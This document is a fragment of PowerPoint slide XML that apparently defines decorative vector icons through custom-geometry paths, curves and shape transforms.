                    <a:pt x="461" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="211"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="156" y="294"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="133" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="294"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="246" y="213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="213"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="374" y="294"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="345" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="29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8B8148B8-51BD-46EB-97AB-477B7386EF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835288" flipH="1" flipV="1">
              <a:off x="9566286" y="2327353"/>
              <a:ext cx="560269" cy="525991"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 200"/>
                <a:gd name="T1" fmla="*/ 144 h 188"/>
                <a:gd name="T2" fmla="*/ 0 w 200"/>
                <a:gd name="T3" fmla="*/ 20 h 188"/>
                <a:gd name="T4" fmla="*/ 180 w 200"/>
                <a:gd name="T5" fmla="*/ 0 h 188"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 124 h 188"/>
                <a:gd name="T8" fmla="*/ 192 w 200"/>
                <a:gd name="T9" fmla="*/ 20 h 188"/>
                <a:gd name="T10" fmla="*/ 20 w 200"/>
                <a:gd name="T11" fmla="*/ 8 h 188"/>
                <a:gd name="T12" fmla="*/ 8 w 200"/>
                <a:gd name="T13" fmla="*/ 124 h 188"/>
                <a:gd name="T14" fmla="*/ 180 w 200"/>
                <a:gd name="T15" fmla="*/ 136 h 188"/>
                <a:gd name="T16" fmla="*/ 192 w 200"/>
                <a:gd name="T17" fmla="*/ 20 h 188"/>
                <a:gd name="T18" fmla="*/ 159 w 200"/>
                <a:gd name="T19" fmla="*/ 108 h 188"/>
                <a:gd name="T20" fmla="*/ 139 w 200"/>
                <a:gd name="T21" fmla="*/ 100 h 188"/>
                <a:gd name="T22" fmla="*/ 166 w 200"/>
                <a:gd name="T23" fmla="*/ 83 h 188"/>
                <a:gd name="T24" fmla="*/ 166 w 200"/>
                <a:gd name="T25" fmla="*/ 103 h 188"/>
                <a:gd name="T26" fmla="*/ 123 w 200"/>
                <a:gd name="T27" fmla="*/ 48 h 188"/>
                <a:gd name="T28" fmla="*/ 100 w 200"/>
                <a:gd name="T29" fmla="*/ 88 h 188"/>
                <a:gd name="T30" fmla="*/ 64 w 200"/>
                <a:gd name="T31" fmla="*/ 88 h 188"/>
                <a:gd name="T32" fmla="*/ 44 w 200"/>
                <a:gd name="T33" fmla="*/ 48 h 188"/>
                <a:gd name="T34" fmla="*/ 44 w 200"/>
                <a:gd name="T35" fmla="*/ 47 h 188"/>
                <a:gd name="T36" fmla="*/ 24 w 200"/>
                <a:gd name="T37" fmla="*/ 36 h 188"/>
                <a:gd name="T38" fmla="*/ 52 w 200"/>
                <a:gd name="T39" fmla="*/ 24 h 188"/>
                <a:gd name="T40" fmla="*/ 117 w 200"/>
                <a:gd name="T41" fmla="*/ 36 h 188"/>
                <a:gd name="T42" fmla="*/ 129 w 200"/>
                <a:gd name="T43" fmla="*/ 36 h 188"/>
                <a:gd name="T44" fmla="*/ 124 w 200"/>
                <a:gd name="T45" fmla="*/ 48 h 188"/>
                <a:gd name="T46" fmla="*/ 96 w 200"/>
                <a:gd name="T47" fmla="*/ 76 h 188"/>
                <a:gd name="T48" fmla="*/ 60 w 200"/>
                <a:gd name="T49" fmla="*/ 68 h 188"/>
                <a:gd name="T50" fmla="*/ 56 w 200"/>
                <a:gd name="T51" fmla="*/ 48 h 188"/>
                <a:gd name="T52" fmla="*/ 104 w 200"/>
                <a:gd name="T53" fmla="*/ 56 h 188"/>
                <a:gd name="T54" fmla="*/ 111 w 200"/>
                <a:gd name="T55" fmla="*/ 48 h 188"/>
                <a:gd name="T56" fmla="*/ 59 w 200"/>
                <a:gd name="T57" fmla="*/ 93 h 188"/>
                <a:gd name="T58" fmla="*/ 59 w 200"/>
                <a:gd name="T59" fmla="*/ 113 h 188"/>
                <a:gd name="T60" fmla="*/ 59 w 200"/>
                <a:gd name="T61" fmla="*/ 93 h 188"/>
                <a:gd name="T62" fmla="*/ 105 w 200"/>
                <a:gd name="T63" fmla="*/ 103 h 188"/>
                <a:gd name="T64" fmla="*/ 85 w 200"/>
                <a:gd name="T65" fmla="*/ 103 h 188"/>
                <a:gd name="T66" fmla="*/ 64 w 200"/>
                <a:gd name="T67" fmla="*/ 168 h 188"/>
                <a:gd name="T68" fmla="*/ 72 w 200"/>
                <a:gd name="T69" fmla="*/ 152 h 188"/>
                <a:gd name="T70" fmla="*/ 128 w 200"/>
                <a:gd name="T71" fmla="*/ 168 h 188"/>
                <a:gd name="T72" fmla="*/ 156 w 200"/>
                <a:gd name="T73" fmla="*/ 188 h 188"/>
                <a:gd name="T74" fmla="*/ 64 w 200"/>
                <a:gd name="T75" fmla="*/ 16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188">
                  <a:moveTo>
                    <a:pt x="180" y="144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="144"/>
                    <a:pt x="20" y="144"/>
                    <a:pt x="20" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="144"/>
                    <a:pt x="0" y="135"/>
                    <a:pt x="0" y="1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35"/>
                    <a:pt x="191" y="144"/>
                    <a:pt x="180" y="144"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="192" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="13"/>
                    <a:pt x="186" y="8"/>
                    <a:pt x="18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31"/>
                    <a:pt x="13" y="136"/>
                    <a:pt x="20" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="136"/>
                    <a:pt x="180" y="136"/>
                    <a:pt x="180" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="136"/>
                    <a:pt x="192" y="131"/>
                    <a:pt x="192" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="166" y="103"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="108"/>
                    <a:pt x="159" y="108"/>
                    <a:pt x="159" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="93"/>
                    <a:pt x="149" y="93"/>
                    <a:pt x="149" y="93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55" y="89"/>
                    <a:pt x="155" y="89"/>
                    <a:pt x="155" y="89"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166" y="103"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="124" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="48"/>
                    <a:pt x="123" y="48"/>
                    <a:pt x="123" y="48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89" y="88"/>
                    <a:pt x="89" y="88"/>
                    <a:pt x="89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9" y="36"/>
                    <a:pt x="129" y="36"/>
                    <a:pt x="129" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="47"/>
                    <a:pt x="124" y="47"/>
                    <a:pt x="124" y="47"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="48"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="76"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="76"/>
                    <a:pt x="96" y="76"/>
                    <a:pt x="96" y="76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60" y="68"/>
                    <a:pt x="60" y="68"/>
                    <a:pt x="60" y="68"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="76"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="56" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="56"/>
                    <a:pt x="57" y="56"/>
                    <a:pt x="57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11" y="48"/>
                    <a:pt x="111" y="48"/>
                    <a:pt x="111" y="48"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="48"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="59" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="93"/>
                    <a:pt x="69" y="97"/>
                    <a:pt x="69" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="109"/>
                    <a:pt x="65" y="113"/>
                    <a:pt x="59" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="113"/>
                    <a:pt x="49" y="109"/>
                    <a:pt x="49" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="97"/>
                    <a:pt x="53" y="93"/>
                    <a:pt x="59" y="93"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="95" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="93"/>
                    <a:pt x="105" y="97"/>
                    <a:pt x="105" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="109"/>
                    <a:pt x="101" y="113"/>
                    <a:pt x="95" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="113"/>
                    <a:pt x="85" y="109"/>
                    <a:pt x="85" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="97"/>
                    <a:pt x="89" y="93"/>
                    <a:pt x="95" y="93"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6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7" y="168"/>
                    <a:pt x="156" y="177"/>
                    <a:pt x="156" y="188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4" y="177"/>
                    <a:pt x="53" y="168"/>
                    <a:pt x="64" y="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46477F9E-4060-4B69-85B9-C65093F63612}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="7356324" y="1217852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8DD94C88-F291-403E-B520-1124B0BF77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6859567" flipH="1" flipV="1">
              <a:off x="10501760" y="5059795"/>
              <a:ext cx="392613" cy="655277"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 284"/>
                <a:gd name="T1" fmla="*/ 332 h 474"/>
                <a:gd name="T2" fmla="*/ 170 w 284"/>
                <a:gd name="T3" fmla="*/ 303 h 474"/>
                <a:gd name="T4" fmla="*/ 198 w 284"/>
                <a:gd name="T5" fmla="*/ 275 h 474"/>
                <a:gd name="T6" fmla="*/ 255 w 284"/>
                <a:gd name="T7" fmla="*/ 247 h 474"/>
                <a:gd name="T8" fmla="*/ 284 w 284"/>
                <a:gd name="T9" fmla="*/ 275 h 474"/>
                <a:gd name="T10" fmla="*/ 198 w 284"/>
                <a:gd name="T11" fmla="*/ 303 h 474"/>
                <a:gd name="T12" fmla="*/ 227 w 284"/>
                <a:gd name="T13" fmla="*/ 389 h 474"/>
                <a:gd name="T14" fmla="*/ 198 w 284"/>
                <a:gd name="T15" fmla="*/ 360 h 474"/>
                <a:gd name="T16" fmla="*/ 227 w 284"/>
                <a:gd name="T17" fmla="*/ 332 h 474"/>
                <a:gd name="T18" fmla="*/ 255 w 284"/>
                <a:gd name="T19" fmla="*/ 417 h 474"/>
                <a:gd name="T20" fmla="*/ 227 w 284"/>
                <a:gd name="T21" fmla="*/ 446 h 474"/>
                <a:gd name="T22" fmla="*/ 227 w 284"/>
                <a:gd name="T23" fmla="*/ 389 h 474"/>
                <a:gd name="T24" fmla="*/ 255 w 284"/>
                <a:gd name="T25" fmla="*/ 417 h 474"/>
                <a:gd name="T26" fmla="*/ 170 w 284"/>
                <a:gd name="T27" fmla="*/ 474 h 474"/>
                <a:gd name="T28" fmla="*/ 198 w 284"/>
                <a:gd name="T29" fmla="*/ 446 h 474"/>
                <a:gd name="T30" fmla="*/ 227 w 284"/>
                <a:gd name="T31" fmla="*/ 474 h 474"/>
                <a:gd name="T32" fmla="*/ 142 w 284"/>
                <a:gd name="T33" fmla="*/ 417 h 474"/>
                <a:gd name="T34" fmla="*/ 170 w 284"/>
                <a:gd name="T35" fmla="*/ 389 h 474"/>
                <a:gd name="T36" fmla="*/ 170 w 284"/>
                <a:gd name="T37" fmla="*/ 446 h 474"/>
                <a:gd name="T38" fmla="*/ 142 w 284"/>
                <a:gd name="T39" fmla="*/ 417 h 474"/>
                <a:gd name="T40" fmla="*/ 113 w 284"/>
                <a:gd name="T41" fmla="*/ 332 h 474"/>
                <a:gd name="T42" fmla="*/ 142 w 284"/>
                <a:gd name="T43" fmla="*/ 360 h 474"/>
                <a:gd name="T44" fmla="*/ 113 w 284"/>
                <a:gd name="T45" fmla="*/ 389 h 474"/>
                <a:gd name="T46" fmla="*/ 56 w 284"/>
                <a:gd name="T47" fmla="*/ 360 h 474"/>
                <a:gd name="T48" fmla="*/ 28 w 284"/>
                <a:gd name="T49" fmla="*/ 389 h 474"/>
                <a:gd name="T50" fmla="*/ 0 w 284"/>
                <a:gd name="T51" fmla="*/ 417 h 474"/>
                <a:gd name="T52" fmla="*/ 28 w 284"/>
                <a:gd name="T53" fmla="*/ 0 h 474"/>
                <a:gd name="T54" fmla="*/ 56 w 284"/>
                <a:gd name="T55" fmla="*/ 17 h 474"/>
                <a:gd name="T56" fmla="*/ 28 w 284"/>
                <a:gd name="T57" fmla="*/ 45 h 474"/>
                <a:gd name="T58" fmla="*/ 56 w 284"/>
                <a:gd name="T59" fmla="*/ 360 h 474"/>
                <a:gd name="T60" fmla="*/ 85 w 284"/>
                <a:gd name="T61" fmla="*/ 332 h 474"/>
                <a:gd name="T62" fmla="*/ 56 w 284"/>
                <a:gd name="T63" fmla="*/ 360 h 474"/>
                <a:gd name="T64" fmla="*/ 56 w 284"/>
                <a:gd name="T65" fmla="*/ 74 h 474"/>
                <a:gd name="T66" fmla="*/ 85 w 284"/>
                <a:gd name="T67" fmla="*/ 45 h 474"/>
                <a:gd name="T68" fmla="*/ 113 w 284"/>
                <a:gd name="T69" fmla="*/ 102 h 474"/>
                <a:gd name="T70" fmla="*/ 85 w 284"/>
                <a:gd name="T71" fmla="*/ 74 h 474"/>
                <a:gd name="T72" fmla="*/ 113 w 284"/>
                <a:gd name="T73" fmla="*/ 102 h 474"/>
                <a:gd name="T74" fmla="*/ 113 w 284"/>
                <a:gd name="T75" fmla="*/ 303 h 474"/>
                <a:gd name="T76" fmla="*/ 85 w 284"/>
                <a:gd name="T77" fmla="*/ 332 h 474"/>
                <a:gd name="T78" fmla="*/ 227 w 284"/>
                <a:gd name="T79" fmla="*/ 218 h 474"/>
                <a:gd name="T80" fmla="*/ 255 w 284"/>
                <a:gd name="T81" fmla="*/ 247 h 474"/>
                <a:gd name="T82" fmla="*/ 227 w 284"/>
                <a:gd name="T83" fmla="*/ 218 h 474"/>
                <a:gd name="T84" fmla="*/ 227 w 284"/>
                <a:gd name="T85" fmla="*/ 190 h 474"/>
                <a:gd name="T86" fmla="*/ 198 w 284"/>
                <a:gd name="T87" fmla="*/ 218 h 474"/>
                <a:gd name="T88" fmla="*/ 170 w 284"/>
                <a:gd name="T89" fmla="*/ 161 h 474"/>
                <a:gd name="T90" fmla="*/ 198 w 284"/>
                <a:gd name="T91" fmla="*/ 190 h 474"/>
                <a:gd name="T92" fmla="*/ 170 w 284"/>
                <a:gd name="T93" fmla="*/ 161 h 474"/>
                <a:gd name="T94" fmla="*/ 113 w 284"/>
                <a:gd name="T95" fmla="*/ 133 h 474"/>
                <a:gd name="T96" fmla="*/ 142 w 284"/>
                <a:gd name="T97" fmla="*/ 104 h 474"/>
                <a:gd name="T98" fmla="*/ 170 w 284"/>
                <a:gd name="T99" fmla="*/ 133 h 474"/>
                <a:gd name="T100" fmla="*/ 142 w 284"/>
                <a:gd name="T101" fmla="*/ 161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4" h="474">
                  <a:moveTo>
                    <a:pt x="198" y="303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="303"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="227" y="360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="360"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="255" y="417"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="255" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="417"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="474"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="474"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="142" y="417"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="417"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="113" y="360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="360"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="56" y="360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="360"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="85" y="74"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="74"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="113" y="102"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="102"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="85" y="303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="303"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="227" y="218"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="255" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="218"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="190"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="170" y="161"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="161"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="142" y="133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="1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3876307B-7197-443D-9223-1EF13F59122F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2112827" flipH="1" flipV="1">
              <a:off x="10761226" y="1169902"/>
              <a:ext cx="314410" cy="448364"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 190"/>
                <a:gd name="T1" fmla="*/ 101 h 272"/>
                <a:gd name="T2" fmla="*/ 178 w 190"/>
                <a:gd name="T3" fmla="*/ 82 h 272"/>
                <a:gd name="T4" fmla="*/ 96 w 190"/>
                <a:gd name="T5" fmla="*/ 0 h 272"/>
                <a:gd name="T6" fmla="*/ 14 w 190"/>
                <a:gd name="T7" fmla="*/ 82 h 272"/>
                <a:gd name="T8" fmla="*/ 17 w 190"/>
                <a:gd name="T9" fmla="*/ 103 h 272"/>
                <a:gd name="T10" fmla="*/ 0 w 190"/>
                <a:gd name="T11" fmla="*/ 272 h 272"/>
                <a:gd name="T12" fmla="*/ 190 w 190"/>
                <a:gd name="T13" fmla="*/ 272 h 272"/>
                <a:gd name="T14" fmla="*/ 176 w 190"/>
                <a:gd name="T15" fmla="*/ 10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272">
                  <a:moveTo>
                    <a:pt x="176" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="95"/>
                    <a:pt x="178" y="89"/>
                    <a:pt x="178" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="37"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="0"/>
                    <a:pt x="14" y="37"/>
                    <a:pt x="14" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="15" y="96"/>
                    <a:pt x="17" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="135"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="0" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                  </a:cubicBezTo>
